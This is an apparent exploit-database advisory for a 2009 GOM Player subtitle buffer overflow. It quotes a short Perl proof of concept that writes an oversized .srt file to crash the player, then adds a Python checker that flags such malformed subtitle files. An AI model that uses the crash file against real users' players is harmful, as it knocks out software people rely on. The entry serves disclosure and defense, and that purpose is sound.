Vendor: GOM Player
By: Bui Quang Minh
CVSS: 7.5 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: GOM Player
Affected Version From: 2.1.16.6134
Affected Version To: 2.1.16.6134
Patch Exists: YES
Related CWE: N/A
CPE: a:gomlab:gom_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, Windows Vista, Windows 7
Year: 2009

GOM Player Subtitle Buffer Overflow Vulnerability

A buffer overflow vulnerability exists in GOM Player 2.1.16.6134. A specially crafted .srt file with a length of 10240 x 4 bytes can cause a denial of service condition when opened with GOM Player. This vulnerability affects Windows XP, Windows Vista, and Windows 7.

Mitigation:

Upgrade to the latest version of GOM Player.

Exploit-DB raw data:

#!/usr/local/bin/perl

##################################################################
#
#	Title : GOM Player Subtitle Buffer Overflow Vulnerability
#	Discovery by : Bui Quang Minh
#	Tested : GOM Player 2.1.16.6134
#	Reference : Bkis [http://security.bkis.vn/?p=501]
#	PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#	
##################################################################

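# "A" x 10240 x 4 repeats the 10240-byte string four times: 40960 bytes of "A"
my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
# The buffer is written as the whole subtitle file, with no SRT cue structure
open (FILE,">$filename") || die "\nCan't open $filename: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";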

# milw0rm.com [2009-04-08]
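
A defender-side check for the file shape the PoC above produces, added here as an example (it is not part of the original entry or the researcher's code): it flags subtitle files that contain an over-long line or no SRT timing line. The names `check_srt` and `MAX_LINE_BYTES` and the 1024-byte threshold are assumptions; the page does not state the size of the buffer that overflows.

```python
import re

# Assumed triage threshold; the page does not give the size of the buffer
# GOM Player overflows, so this is a conservative guess, not a known limit.
MAX_LINE_BYTES = 1024

# SRT timing line, e.g. "00:00:01,000 --> 00:00:04,000"
TIMING = re.compile(
    rb"^\d{2,}:\d{2}:\d{2}[,.]\d{3}\s+-->\s+\d{2,}:\d{2}:\d{2}[,.]\d{3}"
)


def check_srt(data, max_line=MAX_LINE_BYTES):
    """Return a list of findings for the raw bytes of one subtitle file."""
    findings = []
    if data.startswith(b"\xef\xbb\xbf"):  # strip a UTF-8 byte order mark
        data = data[3:]
    # Normalise CRLF / CR line endings before splitting into lines.
    lines = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n").split(b"\n")
    cues = 0
    for number, line in enumerate(lines, start=1):
        if len(line) > max_line:
            findings.append(
                f"line {number}: {len(line)} bytes exceeds {max_line}"
            )
        if TIMING.match(line.strip()):
            cues += 1
    # A non-empty file with no timing line is not a usable SRT file.
    if cues == 0 and data.strip():
        findings.append("no SRT timing line found")
    return findings


# Constructed samples: a minimal valid cue, and a file with the same shape
# as the PoC output (40960 bytes of "A", no cue structure).
VALID = b"1\r\n00:00:01,000 --> 00:00:04,000\r\nHello\r\n\r\n"
POC_SHAPED = b"A" * (10240 * 4)

if __name__ == "__main__":
    import sys
    # Usage: python check_srt.py file1.srt file2.srt ...
    for path in sys.argv[1:]:
        with open(path, "rb") as handle:
            for finding in check_srt(handle.read()):
                print(f"{path}: {finding}")
```

A check like this is a stopgap for triaging untrusted subtitle files on hosts that still run the affected version; the fix remains the upgrade listed under Mitigation.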